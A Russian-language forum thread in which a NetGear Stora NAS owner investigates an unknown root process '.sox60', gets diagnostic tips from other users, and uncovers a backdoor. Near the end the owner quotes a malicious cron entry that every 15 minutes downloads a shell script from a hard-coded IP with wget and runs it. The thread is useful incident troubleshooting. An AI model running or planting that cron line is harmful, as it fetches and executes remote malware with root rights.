--}}
Новая тема
Вы не можете создавать новые темы.
Т.к. вы неавторизованы на сайте. Пожалуйста назовите себя или зарегистрируйтесь.
Список тем

Что за процесс .sox60?

Нужен совет (поиск решения проблемы. не для купли-продажи)
248
18
С друзьями на NN.RU
В социальных сетях
Поделиться
Atom
26.02.2019
Накопитель NetGear Stora.
В последнее время наблюдаю странное поведение - не всегда папки доступны.
Грузит какой-то процесс .sox60

Источник дает папку /tmp:

bash-3.2# pwdx 22758
22758: /tmp

Там особо ничего не нашел, кроме файла, создающего pid файлы (второй скрин).

Что это?
майнер?
Atom
26.02.2019
Не знаю :(
Либо какой-то руткит словил, либо от minidlna сервера что-то идет - он тоже неплохо грузит.
Вот грохнул его.
PS Телек выключили - нагрузка в 0 упала. Но там просто цифра эфирная в это время играла - проигрывания с накопителя не было.
А почему у тебя всё из под рута запущено? Это неправильно.
Atom
27.02.2019
Ну это уж так производитель сделал. Прошивку сам не менял.
А если дерево процессов посмотреть, что за процесс его запустил? С помощью ps aux --forest например.

Посмотреть где расположен процесс: readlink -f /proc/PID/exe

Источник дает папку /tmp:

Это не источник, просто рабочая директория. По сути просто текущая директория процесса, это не значит что исполнимый файл лежал там.

Ещё можно прицепиться с помощью strace и смотреть что он делает, но там много низкоуровневой инфы, в которой долго ковыряться.
Atom
27.02.2019
Попробую сегодня.
Atom
27.02.2019
Ясности больше не стало

Вытащил этот файл sox30. Вот, что Касперский про него пишет:


Результат проверки
файл безопасен
Размер файла
66,19 КБ
Тип файла
EXE/ELF_ARM
Дата проверки
2019 фев 27 17:15:54
Дата выпуска баз
2019 фев 27 13:38:31 UTC
MD5
726fb2b52f7f79a60ea1bd0f6e57ffc9
SHA1
a763a293aa9b150f3852ce4698c1a2563fffd9ce
SHA256
736d53e7ff5375bfb7aa78b9ea16ded6da402a1d80647e0ea9e89b5a184e2727

Dr.Web тоже ничего подозрительного в нем не находит
Atom
27.02.2019
Круто.
Грохнул файл. Перегрузил Стору. В tmp обнаружился файл с веселым содержимым.
По ссылке - какой-то бэкдор

Он скачивает другой файл.
FreeCat
27.02.2019
Atom писал(а)
По ссылке - какой-то бэкдор

так можно его загрузить и глянуть :) .
Atom
27.02.2019
А nttpd вот что делает....
Atom
27.02.2019
И еще кучу скриптов нашлось, которые копируют какую-то хрень с удаленных серверов...
Жесть... Прошивка последняя? Проще перепрошить чтобы наверняка от всего мусора избавиться, чёрт знает где это всё могло засесть, да и в прошивке могла оказаться дыра.
Atom
27.02.2019
Она давно не обновляется - не выпускают обновы уже.
Отрубил доступ к нету, гадость эту прибил. Дальше конечно смотреть, что куда засело....

Херню эту заметил по нетипичному морганию светодиодов HDD в отсутствии обращений по сети. Сейчас все тихо.
Можно хотя бы перепрошить заново на ту что есть, где-то сохранить список всех файлов системы с хешами и потом если что можно будет сверять какие файлы изменились.

Вот то что всё запускается под рутом плохо, достаточно сломать одну программу, например тот же minidlna и можно делать со всей системой что угодно.
Atom
27.02.2019
Эта хрень еще в крон себя прописала:

*/15 * * * * root ps -A | grep -q .nttpd && exit 0; cd /tmp; rm -f wznsR.sh; wget http://188.92.74.189/wznsR.sh; chmod +x wznsR.sh; ./wznsR.sh
Кстати, имя файла гуглится community.netgear.com/t5/Sto...9/highlight/true
Atom
27.02.2019
оно
Новая тема
Вы не можете создавать новые темы.
Т.к. вы неавторизованы на сайте. Пожалуйста назовите себя или зарегистрируйтесь.
Список тем
Последние темы форумов